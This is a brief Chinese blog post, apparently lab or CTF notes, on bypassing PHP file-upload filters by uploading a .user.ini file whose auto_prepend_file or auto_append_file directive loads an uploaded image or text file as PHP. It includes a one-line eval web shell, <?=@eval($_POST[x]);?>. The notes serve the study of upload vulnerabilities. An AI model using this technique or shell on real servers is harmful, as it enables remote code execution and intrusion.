文件上传--php user.ini详解

wizard骑士2024-05-07 11:13

文件上传

参考文档：https://www.php.net/manual/zh/configuration.file.per-user.php

如果你的 PHP 以模块化运行在 Apache 里，则用 <var class="filename">.htaccess</var> 文件有同样效果。

auto_prepend_file 表示在每个PHP脚本之前自动加载指定的文件。该文件的内容将被插入到原始脚本的顶部。

auto_prepend_file="shell.png"

auto_append_file 这个是指内容添加到文末，如果有exit会无法调用到

文件上传一

修改后缀--失败

大小写，php3等等--没有显示错误，上传成功

尝试访问图片--没有被解析，下载到了本地

尝试00截断--失败

使用.user.ini 使用auto_prepend_file="shell.png"

上传shell.png

成功

文件上传二：

上传一个普通的png文件：发现路径

上传.user.ini文件使用 auto_append_file="1.txt"

上传1.txt

上传失败疑似是过滤php，使用简写<?=@eval($_POST[x]);?>

成功

上一篇：基于Opencv的车牌识别系统（毕业设计可用）

下一篇：京东科技数字化营销能力的演进与最佳实践| 京东云技术团队

热门推荐

01【HarmonyOS】HUAWEI DevEco Studio 下载地址汇总 02(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明 03组基轨迹建模 GBTM的介绍与实现（Stata 或 R）04【AIGC】重塑未来的科技巨轮 05全面解析：构建基于深度学习的安全帽检测系统（UI界面+YOLO代码+数据集）06【经验分享】Ubuntu22.04安装微信(linux官方版)07基于YOLOv10深度学习的CT扫描图像肾结石智能检测系统【python源码+Pyqt5界面+数据集+训练代码】深度学习实战、目标检测 08Ubuntu 20.04使用Livox mid 360 测试 FAST_LIO 09RAG 实践- Ollama+RagFlow 部署本地知识库 10【TC3xx芯片】TC3xx芯片电源管理系统PMS详解